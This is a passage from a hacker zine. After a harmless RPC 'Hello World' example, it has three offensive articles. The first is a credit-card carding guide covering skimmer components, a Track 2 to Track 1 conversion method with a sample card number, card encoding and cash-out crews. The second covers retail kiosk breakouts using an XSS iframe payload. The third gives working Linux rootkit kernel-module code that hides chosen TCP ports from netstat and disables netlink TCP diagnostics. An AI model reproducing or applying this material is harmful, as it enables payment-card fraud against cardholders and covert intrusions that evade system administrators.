- [Kan83] Ravi Kannan, improved algorithms for integer programming and related
- lattice problems, In Proc. 15th ACM Symp. on Theory of Computing (STOC)(1983),
- 193-206.
- [Ajt98] M. Ajtai, The shortest vector problem in L2 is NP-hard for randomized
- reduc-tions, Proc. of 30th STOC. ACM (1998), 10-19.
- [GN08] N.Gama and P.Q.Nguyen, Predicting lattic reduction, Advances in
- Cryptology, Proc. Eurocrypt '08, Lecture Notes in Computer Science, Springer
- 2008
- [MR09] D.J. Bernstein, J. Buchmann and E. Dahmen, Post Quantum Cryptography,
- chapter Lattice-based Cryptography by Daniele Micciancio and Oded Regev,
- 147-191, Springer 2009.
- [JHLW11] Jesko Huettenhain, Lars A. Wallenborn, Lattice-Based Methods, Seminar
- Topics in Post-Quantum Cryptography (2011),
- http://www.uni-bonn.de/~rattle/works/lattices.pdf
- -----------------------------------------------------------------------[ eof ]--
- [==================================================================================================]
- -=[ 0x04 duper's Code Corner
- -=[ Author: duper
- -=[ Website: http://projects.ext.haxnet.org/~super/
- o o o
- | | |
- o-O o o o-o o-o o-o o-o o-o o-o o-O o-o o-o o-o o-o o-o o-o o-o
- | | | | | | |-' | \ | | | | | |-' | | | | | | |-' |
- o-o o--o O-o o-o o o-o o-o o-o o-o o-o o-o o-o o o o o-o o
- |
- o
- /**
- * Code for creating the client and server sides of a Transport
- * Independent Remote Procedure Call "Hello World" in Linux
- *
- * i.e. not based on the SunRPC code of glibc
- *
- * Super-user access is not required, only a running portmapper.
- */
- #include<stdio.h>
- #include<stdlib.h>
- #include<string.h>
- #include<rpc/rpc.h>
- /**
- * gcc -o create-tcp-rpc-client create-tcp-rpc-client.c -ltirpc
- */
- void vexit(const char *funcname)
- {
- perror(funcname);
- exit(EXIT_FAILURE);
- }
- void dispatch(struct svc_req *request, SVCXPRT *xprt)
- {
- FILE *afile = fopen("/tmp/a.txt", "a");
- if(!afile)
- vexit("fopen");
- fputs("Hello World!\n", afile);
- fclose(afile);
- return;
- }
- int main(void)
- {
- SVCXPRT* svcxprt = svctcp_create(RPC_ANYSOCK, 0, 0);
- if(!svcxprt)
- vexit("svctcp_create");
- printf("xp_sock: %d\n", svcxprt->xp_sock);
- printf("xp_port: %d\n", svcxprt->xp_port);
- if(svc_register(svcxprt, 101337, 1, dispatch, IPPROTO_TCP) != 1)
- vexit("svc_register");
- svc_run();
- exit(EXIT_SUCCESS);
- }
- #include<stdio.h>
- #include<stdlib.h>
- #include<string.h>
- #include<rpc/rpc.h>
- /**
- * gcc -o create-tcp-rpc-client create-tcp-rpc-client.c -ltirpc
- */
- void clnt_vexit(enum clnt_stat value)
- {
- clnt_perrno(value);
- exit(EXIT_FAILURE);
- }
- void vexit(const char *funcname)
- {
- perror(funcname);
- exit(EXIT_FAILURE);
- }
- int main(void)
- {
- char *in = "", *out = "";
- enum clnt_stat s = rpc_call("192.168.1.113", 101337, 1, 1, xdr_int, in, xdr_int, out, "tcp");
- if(s != RPC_SUCCESS)
- clnt_vexit(s);
- exit(EXIT_SUCCESS);
- }
- [==================================================================================================]
- -=[ 0x05 The Tech Behind Credit Card Fraud
- -=[ Author: K141
- [[ Introduction ]]
- ---------------
- Plastics carding is by far the most profitable type of credit card fraud - the replication, or
- spoofing, of magnetic stripe data to a secondary suitable medium host (magstripe card) being the
- most common form. I have written this paper to address the followed criminal procedures while
- explaining these steps as basically as possible. There are numerous papers and articles released
- that do not even touch the issues at hand; how these criminals obtain this information and more
- generally, who does what in the spectrum of physical carding.
- While 'physical carding' or plastics carding is dwarfed by the volume of virtual/online carding
- done, it still stands as a major contender. Technologies exist which could eradicate this type of
- attack; however, we see no intention of this from the banks as it involves critical changes in the
- current infrastructure. To date, I see no tech-related reason why this form of fraud is still
- allowed to be committed.
- [[ Track Data ]]
- ------------
- Within a credit card (high-coercive magnetic stripe card), there exists 3 tracks of data (3 sections
- that are capable of storing data separately). This paper will cover the logical side of magstripe
- encoding (all 3 tracks and relevant data) and not the physical, that is, the widths of each track,
- polarities and coercivity. After reading, you should be more familiar with the processes involved in
- how criminals obtain and handle this data to produce profits.
- The majority of the time, Track 1 data is not needed for cashing out with plastics. This is the
- information that will be shown on the receipt and/or POS (point-of-sale) terminal. There exist some
- terminals, though, that require Track 1 to be present, and a good attacker (or 'carder') will always
- fill their Track 1 field. Luckily for the attacker, Track 1s can be generated entirely based on
- Track 2 data. It is important to mention that Track 1 is derived from the information on Track 2 and
- is often used as a fail-safe if Track 2 is or can not be read. This is also the only track that
- accepts alphanumeric characters.
- Track 2 data is the most important for 'cashing out'. This is where the relevant information for
- generating Track 1 data is held, as well as other data that allows a transaction to occur.
- Track 3 data, mostly, is null.
- Before a transaction may occur, a PIN is necessary for authentication. With that said, generally
- speaking, Track 2 data + PIN = the ability to cash out with that card.
- [[ Obtaining Track Data ]]
- -----------------------
- On many hacking/carding forums, there exist endless advertisements of "Dumps + PINs for sale". These
- sellers, the majority of the time, are fraudulent (oh, irony) and will request a large 'minimum
- amount' in order to successfully defraud at least $300 or so to make the scam worth their while. If
- a seller is genuine and is selling Track 2 data + PINs (a rarity, but it does occur), he/she knows
- the balance of the said account and knows this to be low. There do exist some legitimate sellers;
- however, the data they sell is typically Track 2 only and can only be cashed out by the minority of
- the carding community.
- That being said, online vendors are not the only source of 'dumps'. An assailant may obtain Track 2
- data with PINs by either building or buying their own card skimmer.
- [[ ATM Skimming ]]
- --------------
- A 'skimmer' device is typically placed over the mouth of a genuine ATM in order to steal track data
- before the card is legitimately read by the machine. As the victim's credit card is entered into the
- ATM, it passes through the false fascia (the skimming device) and the Track 2 section passes over
- the Track 2 read head, stealing the information. As it only passes over the read head, this card is
- still able to enter the ATM machine and offer the same functionality as an un-tampered ATM.
- If the skimming device is coupled with a miniature camera, it will take this Track 2 data, parse it
- into a file on its storage medium, and also timestamp this data for later reference to the
- timestamped video footage of pin entry. These skimmers must then be collected from the ATM after the
- attack is complete (usually during early hours in the morning to avoid detection, or when the
- battery has run low).
- If the skimming device is coupled with a pin-pad overlay, it will transmit Track 2 data and PIN via
- SMS or Bluetooth to the attacker's phone, reducing the risk of the attacker being caught and
- concurrently allowing remote operation. These skimmers will only need to be re-visited when the
- battery runs low.
- An ATM skimming device is comprised of a few components:
- - Fascia: To overlay the ATM mouth without suspicion.
- - T2 Read Head: A small device to read the Track 2 data from the magnetic stripe card. Note,
- ideally a skimmer will read only one track of information, as to keep the size of the device
- minimal.
- - Custom printed PCB: This parses the data taken from the Track 2 head and stores it to addressed
- memory locations, usually a Micro-SD card or to the Bluetooth module.
- - Bluetooth module (optional): A Bluetooth or SMS module is often used for remotely transmitting
- Track 2 data, along with PINs back to the carder.
- - Battery: To power the device.
- The components required to build these devices are inexpensive, but the main obstacle towards the
- building of a skimmer is technical know-how. I have found the price of pre-built skimmers currently
- to range from $600-$8000, as opposed to $100-700 in building costs.
- [[ POS Skimming ]]
- --------------
- Point of sale skimming is a software-based attack in which the firmware of the POS terminal is
- flashed, rather than a physical device inserted. Common models are the VeriFone Vx510 and various
- other Ingenico devices. These skimmers are mostly 'offline' skimmers, in which the target will
- believe he/she is making a purchase with their card, and a transaction will appear to process along
- with a receipt print, but no charge will actually occur. Instead, the card has just been swiped and
- the target has entered their PIN. A flashed firmware can be programmed to output a later receipt
- with all three track details, as well as PIN, or designed to save to file for later use. These
- skimmers are usually deployed in stores with the store owner's knowledge, as he/she may be forcibly
- issued to comply or offered a percentage of all money made.
- An attacker wishing to purchase a chipped/flashed POS terminal will expect to pay $1000. All dumps
- are encrypted, with the seller holding the encryption key. This forces the buyer to return to the
- seller, send the encrypted file, and in return, receive only a percentage of the original skimmed
- cards. Alternatively, these skimmers can be bought out for as much as $3,000-10,000.
- [[ Obtaining Track Data Through Malware ]]
- --------------------------------------
- Although rare, ATM malware is an uprising issue among those in the carding community. After the
- success of the Diebold Ghost trojan, there have been countless requests and confirmations of
- development for malware designed on specific platforms, namely the Windows CE environment, a
- favourite among ATM systems. This malware will effectively log all read card data and PINs, printing
- them to a file encrypted by the malware for later collection. Alternatively, some variants have even
- offered to print off all stolen credentials in a 'bank statement' format by using the ATM's printer.
- Needless to say, the deployment of this malware originates from an insider, usually employed or
- hired by the criminals to infect the ATM system from an ATM technician role.
- [[ Converting Track Data ]]
- -----------------------
- Track 2 Data will often appear in the following format:
- 5281169568596016=14101010000045100001
- ^ ^^ ^ ^--CVV
- | || |
- Card number _||_ Service code
- | |
- Field separator Expiration date
- Where:
- 5281169568596016 = credit card number
- 14 = expiry year
- 10 = expiry month
- 101 = service code
- 451 = CVV
- To generate Track 1 information from a Track 2 field, one must follow these simple steps:
- 1. Add a 'B' before the credit card number.
- 2. Replace the '=' with '^LASTNAME/FIRSTNAME^'.
- 3. Add six '0's after the T2 data.
- Thus, our outputted Track1 data should read as follows:
- B5281169568596016^LASTNAME/FIRSTNAME^14101010000045100001000000
- [[ Writing Track Data ]]
- --------------------
- Once both Track 1 and Track 2 fields are complete, the data is ready for writing to the blank
- medium. An attacker will ensure that the medium (magnetic stripe card) he/she selects is of high
- quality printing. Services offered typically cost around $15 per card. If the attacker is running a
- large operation then he/she may even purchase the printing equipment themself. This is comprised of:
- - Hi-Co Magnetic Stripe PVC Cards
- - PVC Printer (Zebra printers are well known for this purpose)
- - PVC card embosser (to emboss credentials on the card)
- - PVC card tipper (to tip the embossing with silver/gold)
- - Signature Panels (on the reverse of the card, often left out by inexperienced carders)
- - Holograms (typically stickers or hot-roll stamps)
- The magnetic stripe medium MUST be Hi-Co. Hi-Co stands for High Coercivity. This is the magnetic
- power that allows the writing of data to occur on Hi-Co cards. All credit/bank cards will be Hi-Co
- and, thus, need the appropriate device to be written to. Any device capable of writing at the
- coercivity of 4000 Oersted (Oe) on the appropriate tracks will be suitable. Note that most standard
- magstripe readers can read Hi-Co cards; coercivity only comes into question in the writing process.
- The most common magnetic stripe Hi-Co writer is the MSR-206 and MSR-606. The supplied software
- packages that come with these writers are extremely easy to operate, and it is only a matter of
- copying and pasting the Track 1 and Track 2 data into the blank track fields, hitting 'write', and
- swiping the blank card through the writer.
- [[ Cashing Track Data ]]
- --------------------
- After this initial attack is complete, the attacker has two options to produce profit:
- 1. Form a crew to work with, willing to cash out this data. Higher risk of law enforcement, lower
- risk of being scammed by those you work with.
- 2. Work with existing crews, often overseas. Lower risk of law enforcement, higher risk of being
- scammed by those you work with.
- Existing crews work on a percentage basis, normally offering a high percentage to the card supplier,
- and if cash out is successful, will either return that percentage through Western Union or run with
- the money. Typically, 'test cards' will be exchanged in order for these crews to prove their
- authenticity.
- Forming a crew usually means a localized operation, susceptible to investigation from local
- authorities before any foreign law enforcement bodies are involved. I believe most crews will
- operate in this manner, a localised crew, often employed by a gang or mafia to supply card data to
- their superiors for resale (such as those sold online) or cashed out by a second team.
- [[ Conclusion ]]
- ------------
- Through my experiences investigating the darker parts of the Internet, specifically carding and
- fraud, trends show that vendors of card data and/or information tend to be from a Russian source. It
- is my belief that the operations involved in the obtaining and distribution of this information is
- largely mafia-based. I hope the information contained within this paper is enough to deter people
- from the 'carding scene' rather than to take an interest in it for personal gain. The people
- involved are generally small fish, but around every large forum I have visited there are people with
- connections I'd dare not to cross.
- [==================================================================================================]
- -=[ 0x06 Brief Notes on Retail Kiosk Hacking
- -=[ Author: storm
- -=[ Email: storm@gonullyourself.org
- -=[ Website: http://gonullyourself.org/
- If you've ever left your basement and ventured outside to the real world, you've more than likely
- come into contact with a kiosk at some point in a store or hotel. Most kiosks provide only a
- limited keyboard or run a very stripped down version of Windows, rendering certain actions difficult
- or impossible to directly achieve, but that only makes it all the more fun. This is no means an
- exhaustive article on hacking retail kiosks, but instead a list of little tips and tricks I've
- compiled through my own personal experiences that may either help you or provide inspiration when
- approaching a new device.
- In the MSP airport, there is a kiosk running software called SiteKiosk. The device provides
- Internet access at outrageous prices ($20/hour), although complimentary access to the airport's
- website and Weather.com is so thoughtfully offered. As I sit typing this, my plane has been delayed
- about 3.5 hours due to the torrents of snow outside, so I figured messing with the kiosk would give
- me something to do other than eating candy and futilely waiting for the Boingo hotspot page to load.
- The keyboard is clunky and missing sensitive keys like Ctrl and Alt; the mouse is a trackball with
- two buttons, though the right-click button seems unresponsive. The web browser used by this kiosk
- looks very much like a version of Internet Explorer themed with cleaner icons, and the file bar and
- taskbar are hidden from view.
- With buttons like Ctrl and Alt missing or disabled, we obviously can't try special key combinations
- like Ctrl+Alt+Del, so the first step is to poke around what we can do with the software. The fact
- that we can access the airport's website and Weather.com is very curious, especially since the
- advertisements load fine (which are hosted on third-party servers), yet putting anything in the URL
- bar pops up a "please insert monies" box. Luckily, Weather.com has an XSS in their quick lookup,
- so a simple search for zip code <iframe src="http://www.google.com"></iframe> injects an IFrame into
- the page, displaying our coveted search engine.
- When a kiosk disallows access to the URL bar, whether it's trying to contain the user to a single
- web site (think the online catalog at Staples stores) or reduce functionality (until the user forks
- up their money), XSS is a good place to start. It is common enough that even if you don't come
- prepared with a known XSS in the target website, it's usually a trivial matter to find one on the
- spot. By injecting an IFrame, we gain the ability to browse any site we wish, as well as exercise
- other web browser functionality that may escalate our access, provide opportunity to escalate our
- access, or provide further information about the box.
- At this point, we have achieved free Internet access (within the IFrame), but there are more
- interesting things to do other than reading Reddit. A simple search for ha.ckers.org's iKat suite
- leads us to a swiss army knife of tools to probe the system we're on.
- Through this, we learn that our user-agent is: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;
- .NET CLR 2.0.50727; SiteKiosk 6.6 Build 213)
- We can browse the filesystem by invoking the "Browse" form field, but unfortunately lack of right-
- click doesn't let us easily open files and execute programs. If right-click were enabled, we would
- be able to browse to C:\Windows\system32\cmd.exe within the prompt, right-click the program, and
- select open to spawn a shell. Explorer.exe is also another good place to start. Once cmd.exe is
- open, we would be able to manipulate the system, probe local files or scan the network, or kill the
- kiosk software using `tasklist` and `taskkill`.
- Unfortunately, the ability to view My Computer also seemed disabled. I did not spend a large amount
- of time probing the system or enumerating all of the tools provided by iKat, but I did discover the
- existence of a file named trust-root.p7b on the Desktop which looked interesting, along with a
- shortcut to the SiteKiosk software.
- In a separate escapade, I was lucky enough to come across an Internet/printing kiosk in the lobby of
- a Marriott hotel provided by a company called iBAHN. If I recall correctly, this too was running
- SiteKiosk, but the interface looked very different than the kiosk I encountered in MSP, and it
- provided a range of additional functions such as printing and access to Microsoft Office. The
- device seemed to take great care not to give too much access to the user (the software provided its
- own, more limited filesystem browser that was meant to open documents from flash drives), but it
- wasn't perfect. By opening Microsoft Word, you could access Windows Explorer through the File menu
- or navigating the help bar in online mode, right-clicking and selecting "View Source". This would
- invoke Notepad with a File menu of its own. Viewing My Computer only showed the CD drive and USB
- stick that was currently plugged in, but it was possible to access C:\ simply by typing it in the
- navigation bar.
- There are plenty of kiosks around to play with, and many of them possess blatant holes in their
- access restriction software. Even if there is nothing inherently interesting on the device, it
- might be a good idea to check if it's connected to the network or if it dials home anywhere. Just
- in general, it's fun to circumvent the software and snoop about the device, and of course things
- like free Internet are always cool too. Some devices I've seen think they are clever, or are just
- unstable, so working or reliable methods of accessing certain kiosks, such as the ones in Barnes &
- Noble, are still to be determined. For instance, attempting to XSS the B&N website from their in-
- store kiosk results in the device locking up and calling for employee assistance. Other devices
- disable right-click, removing certain escalation opportunity and the ability to access critical
- functionality necessary for an attack.
- There is still much fun to be had, so if you have any tips, tricks, or your own kiosk-hacking
- stories, drop us a message and your submission might just be in the next zine.
- [==================================================================================================]
- -=[ 0x07 Linux Rootkit Development Update
- -=[ Author: duper
- -=[ Website: http://projects.ext.haxnet.org/~super/
- In the Linux kernel version 2.6.36, some changes to the procfs API will break the interface that
- previously existing rootkits have with /proc/net/tcp. This is a critical change as far as rootkit
- functionality goes, since a new technique is required to hide TCP ports from userland administration
- programs such as netstat(8) and other network statistics gathering tools. Thanks to fawx for
- initially bringing this issue to my attention.
- As a side note: If you have any questions about the intricacies of the Linux kernel, as we will be
- working closely with it throughout the course of this paper, consult /usr/src/linux/Documentation or
- any of the links provided as references at the bottom.
- Prior to release of the 2.6.36 patch, most Linux rootkits utilized a sequential search of the
- proc_net->subdir linked list to locate the procfs data structure corresponding to the filesystem
- pathname /proc/net/tcp. The way that entries in the /proc/net directory are accessed changed in
- 2.6.36, and as a result the majority of publicly available Linux rootkits featuring TCP connection
- hiding stopped compiling; some benign networking drivers ceased to function as well. The API wasn't
- changed in order to safeguard against rootkits -- that was only an unintended side effect.
- In reality, implementing a kernel-mode TCP data filtering mechanism is even easier with the new
- interface. A new kernel function is dedicated specifically to the purpose of initializing the
- /proc/net/tcp file. Note that I'm using the term "file" loosely in this context, as procfs doesn't
- behave like a typical filesystem that utilizes disk-based storage. In userland, when a file
- descriptor corresponding to a procfs pathname is read(), the results are actually custom-formatted
- kernel data objects. That's why /proc/net/tcp and, in fact, the majority of procfs pathnames, appear
- as empty files when the stat() system call is executed on them. Although procfs files do have
- inodes, their values approach 2**32 (the upper limit for ino_t), and thus they are outside the range
- of use for partitioned disk filesystems. Observe the differences in output between the following two
- commands:
- $ stat /proc/net/tcp
- File: `/proc/net/tcp'
- Size: 0 Blocks: 0 IO Block: 1024 regular empty file
- Device: 3h/3d Inode: 4026531957 Links: 1
- Access: (0444/-r--r--r--) Uid: ( 0/ root) Gid: ( 0/ root)
- Access: 2011-02-19 12:16:32.853287891 -0500
- Modify: 2011-02-19 12:16:32.853287891 -0500
- Change: 2011-02-19 12:16:32.853287891 -0500
- Birth: -
- $ stat /bin/ls
- File: `/bin/ls'
- Size: 109736 Blocks: 224 IO Block: 4096 regular file
- Device: 303h/771d Inode: 7660308 Links: 1
- Access: (0755/-rwxr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root)
- Access: 2010-12-25 23:33:12.000000000 -0500
- Modify: 2010-12-24 12:18:47.000000000 -0500
- Change: 2010-12-24 12:19:01.000000000 -0500
- Birth: -
- As you can see, the procfs pathname has a rather large inode number and a file size of 0, despite
- the fact that we would receive data back if we ran `cat` against it. In the preceding examples, the
- /usr/bin/stat binary (provided by the GNU coreutils package) executed the fstat() system call
- against the the absolute pathnames given as arguments. In this next typescript, statfs() will be run
- due to the "-f" command line option, which is an abbreviated form of the getopt_long() option
- "--file-system", as documented in the stat(1) man page and GNU info pages.
- $ stat -f /boot
- File: "/boot"
- ID: f6c5e14bf02df87f Namelen: 255 Type: ext2/ext3
- Block size: 1024 Fundamental block size: 1024
- Blocks: Total: 32175 Free: 11084 Available: 9423
- Inodes: Total: 8320 Free: 8266
- $ stat -f /proc
- File: "/proc"
- ID: 0 Namelen: 255 Type: proc
- Block size: 4096 Fundamental block size: 4096
- Blocks: Total: 0 Free: 0 Available: 0
- Inodes: Total: 0 Free: 0
- Clearly, procfs is special since the majority of its statistical information is zeroed out. The
- glaring contrast in block size results from extfs handling disk blocks, whereas procfs handles
- memory, as stated previously. On my x86-64 kernel, getpagesize() from unistd.h returns 4096.
- However, page size is platform independent, so your mileage may vary. Note that sysfs behaves in a
- manner identical to procfs according to statfs(). If your kernel is configured to support sysfs,
- you'll find it listed under /sys in your /etc/mtab. The directory that rootkit developers would
- probably want to concern themselves the most with is /sys/kernel. Again, depending on your
- /usr/src/linux/.config or /proc/config.gz settings during the kernel's compile-time, various
- subdirectories could be available under /sys/kernel. My machine has the debug, security, and mm
- (memory manager) directories enabled currently. Now that we've gotten the basics squared away, let's
- take a look at a rootkit..
- struct proc_dir_entry *proc_find_tcp()
- {
- struct proc_dir_entry *p = proc_net->subdir;
- while (strcmp(p->name, "tcp"))
- p = p->next;
- return p;
- }
- This is from adore-ng-0.56, a rootkit I downloaded from packetstormsecurity.org. The code above
- shows the tediousness involved in accessing pathnames under the /proc/net directory. Since the
- kernel didn't have any direct access functions defined, it became necessary to loop over the
- directory entries manually. The last kernel version to be supported by this particular adore-ng
- release appears to be 2.6.16, judging by some conditional preprocessor directives within the source:
- #if LINUX_VERSION_CODE < KERNEL_VERSION(2,6,16)
- MODULE_PARM(root_fs, "s");
- MODULE_PARM(proc_fs, "s");
- MODULE_PARM(opt_fs, "s");
- #else
- module_param(root_fs, charp, 0644);
- module_param(proc_fs, charp, 0644);
- module_param(opt_fs, charp, 0644);
- #endif
- It looks as if prior to 2.6.16 there was less convenient syntax available for those developing
- Loadable Kernel Modules (LKMs). At the time of writing this article, the latest stable Linux kernel
- is 2.6.37.1. However, I'll be using gentoo-sources-2.6.37 from the Gentoo portage tree. For the sake
- of consistency, let's double check the current kernel versions:
- $ finger @kernel.org
- [kernel.org]
- The latest linux-next version of the Linux kernel is: next-20110218
- The latest snapshot 2.6 version of the Linux kernel is: 2.6.38-rc5-git5
- The latest mainline 2.6 version of the Linux kernel is: 2.6.38-rc5
- The latest stable 2.6.37 version of the Linux kernel is: 2.6.37.1
- The latest stable 2.6.36 version of the Linux kernel is: 2.6.36.4
- The latest longterm 2.6.35 version of the Linux kernel is: 2.6.35.11
- The latest stable 2.6.35 version of the Linux kernel is: 2.6.35.9
- The latest longterm 2.6.34 version of the Linux kernel is: 2.6.34.8
- The latest stable 2.6.34 version of the Linux kernel is: 2.6.34.7
- The latest longterm 2.6.32 version of the Linux kernel is: 2.6.32.29
- The latest stable 2.6.32 version of the Linux kernel is: 2.6.32.28
- The latest longterm 2.6.27 version of the Linux kernel is: 2.6.27.58
- The latest stable 2.6.27 version of the Linux kernel is: 2.6.27.57
- The latest stable 2.4.37 version of the Linux kernel is: 2.4.37.11
- In 2.6.36, the pointer to the global proc_net structure variable (seen in the adore-ng-0.56 code
- above) disappeared. After grepping around through the kernel source code a bit, I realized that the
- functionality had been so heavily modified that I wasn't sure where to hook into /proc/net/tcp from.
- I was able to grep /boot/System.map for procfs-related symbols and realized it was going to be a lot
- easier than I thought. I found a tcp_proc_register function that allowed me to re-create
- /proc/net/tcp. Also, the proc_net structure that was being referenced by adore-ng had now become
- init_net. So, I simply deleted the existing /proc/net/tcp with proc_net_remove and re-initialized it
- with the address of a custom struct (just to clarify, we are right now working inside the kernel):
- static struct tcp_seq_afinfo tcp4_seq_afinfo = {
- .name = "tcp",
- .family = AF_INET,
- .seq_fops = {.owner = THIS_MODULE},
- .seq_ops = {.show = new_tcp4_seq_show}
- };
- To understand what's going on here, one needs to realize that procfs makes itself appear to userland
- as any other filesystem would. It exposes various functions for operating on the files and
- directories themselves, e.g., open, read, readdir, seek, etc. That's where the new_tcp4_seq_show
- function comes in. The relative pathname to the file where the real tcp4_seq_show is defined is
- net/ipv4/tcp_ipv4.c (as documented by Documentation/networking/proc_net_tcp.txt). The
- new_tcp4_seq_show function is a malicious wrapper which invokes the legitimate tcp4_seq_show
- function, unless it's determined that the TCP connection currently being processed by a read
- operation on /proc/net/tcp corresponds to a port number that is intended to be hidden by the
- rootkit. In that case, new_tcp4_seq_show will not construct the usual hexadecimal-encoded string
- that describes the connection.
- static int (*old_tcp4_seq_show)(struct seq_file *seq , void *v) = 0;
- // Array initialization syntax must be zero-terminated
- static const unsigned short hidden_ports[] = {6666, 7777, 888, 999, 0};
- static int new_tcp4_seq_show(struct seq_file *seq, void *v)
- {
- const signed int retval = old_tcp_seq_show(seq, v);
- register unsigned short i = 0;
- static unsigned int line = 0;
- auto char hex_port[8] = { 0 }, *offset = seq->buf + seq->count - NET_LINE;
- if(v == SEQ_START_TOKEN)
- return line = 0, retval;
- for(i = 0;hidden_ports[i];i++)
- {
- sprintf(hex_port, ":%04X", hidden_ports[i]);
- if(strstr(offset, hex_port))
- return seq->count -= NET_LINE, retval;
- }
- sprintf(offset, "% 4i", line++);
- return offset[4] = ':', retval;
- }
- The old_tcp_seq_show identifier is simply a function pointer to the original tcp4_seq_show function
- that was assigned to the .seq_ops member of the tcp_seq_afinfo structure, whose definition was shown
- above. To reiterate, our new_tcp4_seq_show function is wrapping the real tcp4_seq_show function. The
- introduction of our wrapper function to the traditional kernel control flow effectively hides
- certain ports from userland by looping over an array that contains the rogue port numbers. In this
- way, running a command such as netstat will not display the TCP connections that have been hidden
- from /proc/net/tcp.
- The hidden_ports array is specified with the C language keywords "static" and "const." These prevent
- the initialized port numbers from being accessed from outside of the current source file and from
- having the values modified after compilation. Also, the hidden_ports array is defined to be of type
- "unsigned short" because the source and destination port fields in TCP packet headers are non-
- negative and 16 bits wide. Section 3.1 of RFC793 demonstrates this with an ASCII art representation.
- 0 1 2 3
- 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
- +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
- | Source Port | Destination Port |
- +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
- Now, to formally register our new /proc/net/tcp mechanisms, we first remove the original, then pass
- pointers to the data structures representing the /proc/net directory and our new tcp entry within
- it. Simply invoke the appropriate functions when initializing the Loadable Kernel Module. The
- module_init macro tells the compiler which function to execute when using insmod on the compiled .ko
- (kernel object) code file.
- static int __init init_hidetcp(void)
- {
- proc_net_remove(&init_net, "tcp");
- tcp_proc_register(&init_net, &tcp4_seq_afinfo);
- return 0;
- }
- module_init(init_hidetcp);
- Let's go ahead and test it out to make sure everything works. After compiling the rootkit itself
- with GNU make and inserting the module into the kernel, we'll use netstat with the "-tW" command
- line flags so only TCP connections are displayed and the wide display format will allow us to view
- DNS hostnames in their entirety. One of the hidden port numbers we defined in the hidden_ports array
- was 7777 so let's see if netstat detects a connection on that port.
- $ gmake
- $ insmod hidetcp.ko
- $ telnet us.undernet.org 7777
- Trying 208.83.20.130...
- Connected to us.undernet.org
- Escape character is '^]'.
- ^]
- telnet> z
- [1]+ Stopped telnet us.undernet.org 7777
- $ netstat -tW
- Active Internet connections (w/o servers)
- Proto Recv-Q Send-Q Local Address Foreign Address State
- tcp 0 0 alien.localdomain:51889 please.dont.hacktheinter.net:6697 ESTABLISHED
- $
- So far, we've seen how to hide TCP connections to or from certain port numbers from userland
- programs that read from procfs. However, there's another way to access information about TCP
- connections using rtnetlink(3). You can determine if a given program is using procfs or a netlink
- protocol by tracing for the respective function calls.
- $ whatis netlink
- netlink (3) - Netlink macros
- netlink (7) - Communication between kernel and userspace (AF_NETLINK)
- $ strace -fe trace=open,socket netstat -tW 2>&1 > /dev/null | egrep -i '(tcp|netlink)'
- open("/proc/net/tcp", O_RDONLY) = 3
- open("/proc/net/tcp6", O_RDONLY) = -1 ENOENT (No such file or directory)
- $ strace -fe trace=open,socket ./ss 2>&1 > /dev/null | egrep -i '(tcp|netlink)'
- socket(PF_NETLINK, SOCK_RAW, 4) = 3
- The ss binary being traced above is a piece of code distributed with iproute2 that retrieves socket
- statistics. Iproute2 has a Wikipedia article at http://en.wikipedia.org/wiki/Iproute2 with some
- helpful links to get you up to speed.
- Some have probably noticed that the raw socket option is succeeding despite the fact that my current
- prompt setting reflects that of a non-root user. Since the PF_NETLINK integer constant is the first
- argument instead of PF_INET, the kernel has no issue with providing a positive return value.
- Please note that rtnetlink isn't the only netlink protocol in existence -- there are many more; far
- too many to mention here. There have been many academic research papers published on the subject of
- netlink over the past decade or so. One of the latest and most interesting is entitled
- "Communicating between the kernel and user-space in Linux using Netlink sockets" by Ayuso, Gasca and
- Lefevre. The types of security-related operations it's capable of performing alone are extremely
- comprehensive. For instance: detecting and mitigating DDoS attacks, subliminal channels between
- processes with disparate privileges, multicasting a single communications channel to multiple system
- users, implementing a dynamic routing protocol like Open Shortest Path First in userland, detecting
- network interfaces with promiscuous mode enabled, etc.
- In this particular scenario, usage of only a specific aspect of netlink is necessary to accomplish
- the final goal of TCP connectivity that's as low-key as possible. Since connections hidden from
- /proc/net/tcp can still be viewed via the netlink socket interface, another technique must be used
- to avoid such disclosure. Here's another example typescript (`man script`) of the ss program from
- the misc directory in iproute2's source tree as it executes on the standard output stream:
- $ ./ss
- State Recv-Q Send-Q Local Address:Port Peer Address:Port
- ESTAB 0 0 192.168.1.100:56921 72.14.204.147:80
- ESTAB 0 0 192.168.1.100:51237 184.27.36.110:22
- In this case, the two TCP sockets listed are both in a connection established state. The four empty
- message queue values being shown mean that the kernel has delivered all pending data transmissions
- to and from the socket as of the current runtime. The code that handles Internet diagnostics
- monitoring for the Linux kernel's rtnetlink protocol is located in /usr/src/linux/net/ipv4/inet_diag.c,
- and /usr/src/linux/include/linux/inet_diag.h is of course the associated header file. TCP-specific
- code is located elsewhere. However, we can simply disable all TCP socket diagnostics without
- referencing any of the tcp_inet_diag oriented source files. The following short code snippet
- inserted into the rootkit module's initialization function is sufficient to prevent netlink from
- utilizing any TCP socket monitoring methods whatsoever:
- static struct inet_diag_handler h;
- h.idiag_type = TCPDIAG_GETSOCK;
- inet_diag_unregister(&h);
- Don't forget to include linux/inet_diag.h. Now iproute2's ss binary won't output any TCP connections
- at all, since the handler responsible for the message type it was processing has now been removed.
- It works, but it would be even better by only allowing Internet socket diagnostics for connections
- whose source and destination port numbers don't match our blacklist. The full inet_diag_handler
- structure must be filled out, and inet_diag_register should be invoked as well. This is similar to
- passing the tcp_seq_afinfo structure to tcp_proc_register as outlined in the previous technique. A
- brief outline tracing nested structure members back to actual port values follows. However, putting
- that concept into compilable rootkit source code form will be left as an exercise for the reader.
- include/net/inet_sock.h
- 112 struct inet_sock {
- 113 __be16 inet_dport;
- 114 __be16 inet_sport;
- 115 }
- include/net/inet_connection_sock.h
- 86 struct inet_connection_sock {
- 87 /* inet_sock has to be the first member! */
- 88 struct inet_sock icsk_inet;
- include/linux/tcp.h
- 292 struct tcp_sock {
- 293 /* inet_connection_sock has to be the first member of tcp_sock */
- 294 struct inet_connection_sock inet_conn;
- net/ipv4/tcp_diag.c
